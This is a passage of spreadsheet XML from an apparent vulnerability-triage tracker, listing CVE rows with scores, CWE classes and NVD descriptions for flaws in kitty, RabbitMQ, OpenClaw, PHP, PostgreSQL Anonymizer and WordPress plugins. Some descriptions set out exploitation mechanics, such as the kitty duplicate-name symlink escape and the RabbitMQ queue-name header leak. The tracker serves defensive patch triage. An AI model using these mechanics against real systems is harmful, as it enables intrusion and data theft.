      </c>
      <c r="S235" s="5" t="inlineStr">
        <is>
          <t>Improper Link Resolution Before File Access in the drag source staging path of the drag and drop protocol in kitty from 0.47.0 before 0.49.0 allows a program writing to the terminal to create files and directories at paths outside the staging directory, because subdir_data_for_drag() in kitty/dnd.c resolves a descendant of the staged item tree by constructing a path string and opening it with safe_open(path, O_DIRECTORY | O_RDONLY, 0) rather than by walking the tree one component at a time, so a client that declares two entries with the same name, the first a symlink whose target is an arbitrary absolute path and the second a directory, causes mkdirat() to fail with EEXIST, which the code ignores, and causes the subsequent path resolution to follow the symlink and return a directory descriptor outside the staging directory, which is then passed as the dirfd argument to add_payload() and used for every further create operation on that item and its descendants. Entry names are sanitised against path separators and dot components, but symlink targets are not validated. Files are created with O_CREAT | O_WRONLY | O_EXCL at mode 0644, so existing files cannot be overwritten, and directories are created with mkdirat() at mode 0755, so the attacker can create intermediate directories that did not previously exist. This results in the creation of files and directories at any path writable by the user running kitty, provided the symlink target is an existing directory.</t>
        </is>
      </c>
      <c r="T235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80430</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67421</t>
        </is>
      </c>
      <c r="D236" s="5" t="n">
        <v>4.5</v>
      </c>
      <c r="E236" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F236" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236" s="5" t="inlineStr"/>
      <c r="I236" s="5" t="inlineStr"/>
      <c r="J236" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K236" s="5" t="inlineStr"/>
      <c r="L236" s="5" t="inlineStr"/>
      <c r="M236" s="5" t="inlineStr"/>
      <c r="N236" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O236" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P236" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q236" s="5" t="inlineStr"/>
      <c r="R236" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S236" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.19, 4.0.24, 4.1.15, 4.2.10, and 4.3.5, RabbitMQ Management rendered an AMQP authorization-error reason containing an attacker-controlled queue name as HTML when the OAuth management UI was enabled. Exploitation requires an attacker with queue configure permission, a management administrator who can see but cannot read that queue, and the administrator clicking Get Message(s). A queue name containing a base element can then retarget the automatic relative refresh because the Content Security Policy omits base-uri and connect-src, and an attacker endpoint that permits the management origin through CORS can receive the victim's Authorization header. This issue is fixed in versions 3.13.19, 4.0.24, 4.1.15, 4.2.10, and 4.3.5.</t>
        </is>
      </c>
      <c r="T236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67421</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100525</t>
        </is>
      </c>
      <c r="D237" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E237" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="inlineStr"/>
      <c r="I237" s="5" t="inlineStr"/>
      <c r="J237" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K237" s="5" t="inlineStr"/>
      <c r="L237" s="5" t="inlineStr"/>
      <c r="M237" s="5" t="inlineStr"/>
      <c r="N237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O237" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P237" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q237" s="5" t="inlineStr"/>
      <c r="R237" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S237" s="5" t="inlineStr">
        <is>
          <t>The OpenClaw Prometheus diagnostics plugin (@openclaw/diagnostics-prometheus) before version 2026.9.3 does not enforce the operator.read scope on its authenticated metrics endpoint. In deployments using an identity-bearing Gateway authentication mode such as trusted-proxy, a caller whose effective role has no read scope can retrieve the diagnostics document even though ordinary read methods reject the same identity, disclosing operational metrics to an authenticated profile intentionally limited below read access. Shared-secret Gateway callers already hold the documented full operator scope and are not affected. The issue is fixed in 2026.9.3; as a workaround, disable the Prometheus endpoint or ensure every identity that can reach it is intended to hold operator.read.</t>
        </is>
      </c>
      <c r="T237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100525</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100553</t>
        </is>
      </c>
      <c r="D238" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E238" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="inlineStr"/>
      <c r="I238" s="5" t="inlineStr"/>
      <c r="J238" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K238" s="5" t="inlineStr"/>
      <c r="L238" s="5" t="inlineStr"/>
      <c r="M238" s="5" t="inlineStr"/>
      <c r="N238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O238" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P238" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q238" s="5" t="inlineStr"/>
      <c r="R238" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S238" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions &gt;= 2026.6.9 and &lt; 2026.8.1 do not declare the native chatId parameter as a delivery target in the Feishu unpin feature, so unpin requests can bypass the shared same-provider cross-context target check. When tools.message.crossContext.allowWithinProvider is disabled, an admitted (authenticated) sender can remove a pin from another Feishu group that the sender and the configured account are otherwise permitted to access, bypassing the intended cross-context message mutation policy. Feishu membership and group authorization still apply, and the demonstrated impact is limited to message mutation (pin removal). The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100553</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100583</t>
        </is>
      </c>
      <c r="D239" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E239" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G239" s="5" t="inlineStr"/>
      <c r="H239" s="5" t="inlineStr"/>
      <c r="I239" s="5" t="inlineStr"/>
      <c r="J239" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K239" s="5" t="inlineStr"/>
      <c r="L239" s="5" t="inlineStr"/>
      <c r="M239" s="5" t="inlineStr"/>
      <c r="N239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O239" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P239" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q239" s="5" t="inlineStr"/>
      <c r="R239" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S239" s="5" t="inlineStr">
        <is>
          <t>OpenClaw Discord versions before 2026.7.1 contain an authorization bypass vulnerability in guild metadata read actions that allows lower-trust senders to retrieve information excluded by channel allowlists. Attackers can bypass the configured Discord read-target policy to access guild metadata from servers or channels outside the operator's allowlist.</t>
        </is>
      </c>
      <c r="T239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100583</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19775</t>
        </is>
      </c>
      <c r="D240" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E240" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F240" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G240" s="5" t="inlineStr"/>
      <c r="H240" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I240" s="5" t="inlineStr"/>
      <c r="J240" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K240" s="5" t="inlineStr"/>
      <c r="L240" s="5" t="inlineStr"/>
      <c r="M240" s="5" t="inlineStr"/>
      <c r="N240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O240" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P240" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q240" s="5" t="inlineStr"/>
      <c r="R240" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S240" s="5" t="inlineStr">
        <is>
          <t>The OpenStation — Desktop Windows, Dock &amp; Virtual Desktops for WP Admin plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.1.7. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with custom-level access and above, to read the title, status, date, permalink, and a 300-character content excerpt of any private, draft, pending, or future post, as well as the content and AI-moderation verdicts of unapproved and spam comments. Any authenticated user with the 'read' capability can self-enable the required AI feature by visiting the /openstation/ portal and toggling their own ai.enabled setting via the POST /desktop-mode/v1/os-settings endpoint, removing any practical barrier to exploitation.</t>
        </is>
      </c>
      <c r="T240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19775</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91769</t>
        </is>
      </c>
      <c r="D241" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E241" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F241" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G241" s="5" t="inlineStr"/>
      <c r="H241" s="5" t="inlineStr"/>
      <c r="I241" s="5" t="inlineStr"/>
      <c r="J241" s="5" t="inlineStr">
        <is>
          <t>openssl, php, rust, hp</t>
        </is>
      </c>
      <c r="K241" s="5" t="inlineStr"/>
      <c r="L241" s="5" t="inlineStr"/>
      <c r="M241" s="5" t="inlineStr"/>
      <c r="N241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O241" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P241" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q241" s="5" t="inlineStr"/>
      <c r="R241" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="S241" s="5" t="inlineStr">
        <is>
          <t>PHP's OpenSSL stream peer verification checks the certificate's subjectAltName entries first and, whenever no entry matches, falls back to the Common Name. RFC 6125 requires the CN to be ignored once the certificate presents any service identity, so a certificate carrying a non-matching DNS SAN was still accepted when its CN matched the requested peer_name. A certificate trusted by the client for one name can therefore be used to impersonate another.</t>
        </is>
      </c>
      <c r="T241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91769</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92829</t>
        </is>
      </c>
      <c r="D242" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E242" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F242" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G242" s="5" t="inlineStr"/>
      <c r="H242" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I242" s="5" t="inlineStr"/>
      <c r="J242" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K242" s="5" t="inlineStr"/>
      <c r="L242" s="5" t="inlineStr"/>
      <c r="M242" s="5" t="inlineStr"/>
      <c r="N242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O242" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P242" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q242" s="5" t="inlineStr"/>
      <c r="R242" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S242" s="5" t="inlineStr">
        <is>
          <t>The Blog2Social: Social Media Auto Post &amp; Scheduler plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 9.1.0. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with contributor-level access and above, to view, modify, or delete other users' Blog2Social records, including disclosing another user's network authentication IDs and scheduled post content, overwriting Open Graph and Twitter Card post metadata on posts they do not own, rebinding another user's social-network authorization, and mass-hiding all users' scheduled posts sitewide. The plugin's b2s_security_nonce is emitted on the post-edit meta box, which Contributors can render, making the nonce available to any authenticated user at that role level or above.</t>
        </is>
      </c>
      <c r="T242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92829</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97469</t>
        </is>
      </c>
      <c r="D243" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E243" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F243" s="5" t="inlineStr">
        <is>
          <t>f86ef6dc-4d3a-42ad-8f28-e6d5547a5007</t>
        </is>
      </c>
      <c r="G243" s="5" t="inlineStr"/>
      <c r="H243" s="5" t="inlineStr"/>
      <c r="I243" s="5" t="inlineStr"/>
      <c r="J243" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K243" s="5" t="inlineStr"/>
      <c r="L243" s="5" t="inlineStr"/>
      <c r="M243" s="5" t="inlineStr"/>
      <c r="N243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O243" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P243" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q243" s="5" t="inlineStr"/>
      <c r="R243" s="5" t="inlineStr">
        <is>
          <t>CWE-328</t>
        </is>
      </c>
      <c r="S243" s="5" t="inlineStr">
        <is>
          <t>PostgreSQL Anonymizer contains a vulnerability that allows unprivileged masked users to repeatedly call the anon.hash() function and collects (seed, hash_output) pairs to perform an offline brute-force attack and deduce the salt. A masked role can run a RESTRICTED function when the call is placed inside the sub-select. The problem is resolved in PostgreSQL Anonymizer 3.2.3 and later versions</t>
        </is>
      </c>
      <c r="T243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97469</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100554</t>
        </is>
      </c>
      <c r="D244" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="E244" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G244" s="5" t="inlineStr"/>
      <c r="H244" s="5" t="inlineStr"/>
      <c r="I244" s="5" t="inlineStr"/>
      <c r="J244" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K244" s="5" t="inlineStr"/>
      <c r="L244" s="5" t="inlineStr"/>
      <c r="M244" s="5" t="inlineStr"/>
      <c r="N244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O244" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P244" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q244" s="5" t="inlineStr"/>
      <c r="R244" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="S244" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') versions &gt;= 2026.5.12 and &lt; 2026.8.1 do not immediately invalidate Canvas HTTP authorization when a paired node is revoked. Node revocation invalidates the WebSocket client, but Canvas HTTP authorization continues to accept and renew the previously granted capability until WebSocket close cleanup completes. As a result, a revoked paired node can continue exercising its Canvas capability against the capability's configured routes during the close grace period. The issue is fixed in 2026.8.1; as a workaround, restart the Gateway after revoking a node that has Canvas access.</t>
        </is>
      </c>
      <c r="T244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100554</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88848</t>
        </is>
      </c>
      <c r="D245" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="E245" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F245" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G245" s="5" t="inlineStr"/>
      <c r="H245" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I245" s="5" t="inlineStr"/>
      <c r="J245" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K245" s="5" t="inlineStr"/>
      <c r="L245" s="5" t="inlineStr"/>
      <c r="M245" s="5" t="inlineStr"/>
      <c r="N245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O245" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P245" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q245" s="5" t="inlineStr"/>
      <c r="R245" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S245" s="5" t="inlineStr">
        <is>
          <t>The MasterStudy LMS WordPress plugin from 1.9 before 3.7.50 does not verify that a course a member asks to enrol in is covered by their membership plan, nor that the plan identifier submitted with the request is one they actually hold, allowing any member to enrol themselves into restricted paid courses outside their plan and beyond the number of courses it entitles them to.</t>
        </is>
      </c>
      <c r="T245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88848</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78394</t>
        </is>
      </c>
      <c r="D246" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="E246" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F246" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G246" s="5" t="inlineStr"/>
      <c r="H246" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I246" s="5" t="inlineStr"/>
      <c r="J246" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K246" s="5" t="inlineStr"/>
      <c r="L246" s="5" t="inlineStr"/>
      <c r="M246" s="5" t="inlineStr"/>
      <c r="N246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O246" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P246" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q246" s="5" t="inlineStr"/>
      <c r="R246" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S246" s="5" t="inlineStr">
        <is>
          <t>The Link Library WordPress plugin before 7.9.6 does not sanitize a user-supplied destination folder before writing a generated image to disk, allowing users with the Contributor role and above to create directories and write or overwrite image files anywhere the web server can write, including outside the site's document root.
The written file name is always numeric with a fixed image extension, so executable code cannot be planted this way.</t>
        </is>
      </c>
      <c r="T246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78394</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78397</t>
        </is>
      </c>
      <c r="D247" s="5" t="n">
        <v>4</v>
      </c>
      <c r="E247" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F247" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G247" s="5" t="inlineStr"/>
      <c r="H247" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I247" s="5" t="inlineStr"/>
      <c r="J247" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K247" s="5" t="inlineStr"/>
      <c r="L247" s="5" t="inlineStr"/>
      <c r="M247" s="5" t="inlineStr"/>
      <c r="N247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O247" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P247" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q247" s="5" t="inlineStr"/>
      <c r="R247" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S247" s="5" t="inlineStr">
        <is>
          <t>The Link Library WordPress plugin before 7.9.6 does not validate the destination of a user-supplied URL before falling back to an unprotected fetch when its safe request is rejected, allowing unauthenticated visitors to make the site issue requests to hosts on its internal network and to learn from the response whether an internal service answered.
Versions below 7.8.8 are covered by CVE-2025-68600; this entry covers 7.8.8 through 7.9.5, where that fix was incomplete. Exploitation requires the site owner to have published the Link Library WordPress plugin before 7.9.6's public link submission form with reciprocal-link validation enabled.</t>
        </is>
      </c>
      <c r="T247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78397</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97896</t>
        </is>
      </c>
      <c r="D248" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E248" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G248" s="5" t="inlineStr"/>
      <c r="H248" s="5" t="inlineStr"/>
      <c r="I248" s="5" t="inlineStr"/>
      <c r="J248" s="5" t="inlineStr">
        <is>
          <t>f5, php, requests, hp</t>
        </is>
      </c>
      <c r="K248" s="5" t="inlineStr"/>
      <c r="L248" s="5" t="inlineStr"/>
      <c r="M248" s="5" t="inlineStr"/>
      <c r="N248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O248" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P248" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q248" s="5" t="inlineStr"/>
      <c r="R248" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S248" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in krayin laravel-crm up to 2.2.5. This vulnerability affects the function ConfigurationForm::rules of the file packages/Webkul/Admin/src/Http/Requests/ConfigurationForm.php of the component Upload Functionality. The manipulation leads to cross site scripting. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. Upgrading to version 2.2.6 is able to resolve this issue. The identifier of the patch is b9836530ec9f5ef0f51653bb0cbbc47ef7184f51. It is advisable to upgrade the affected component.</t>
        </is>
      </c>
      <c r="T248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97896</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97897</t>
        </is>
      </c>
      <c r="D249" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E249" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G249" s="5" t="inlineStr"/>
      <c r="H249" s="5" t="inlineStr"/>
      <c r="I249" s="5" t="inlineStr"/>
      <c r="J249" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K249" s="5" t="inlineStr"/>
      <c r="L249" s="5" t="inlineStr"/>
      <c r="M249" s="5" t="inlineStr"/>
      <c r="N249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O249" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P249" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q249" s="5" t="inlineStr"/>
      <c r="R249" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S249" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Krayin laravel-crm up to 2.2.5. This issue affects some unknown processing of the file Sanitizer.php of the component TinyMCE Media Upload. The manipulation results in cross site scripting. The attack may be performed from remote. Upgrading to version 2.2.6 is capable of addressing this issue. The patch is identified as 734aa10ae6c2ffa4c96c8869a89aa66940e4d345. You should upgrade the affected component.</t>
        </is>
      </c>
      <c r="T249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97897</t>
        </is>
      </c>
    </row>
    <row r="250">
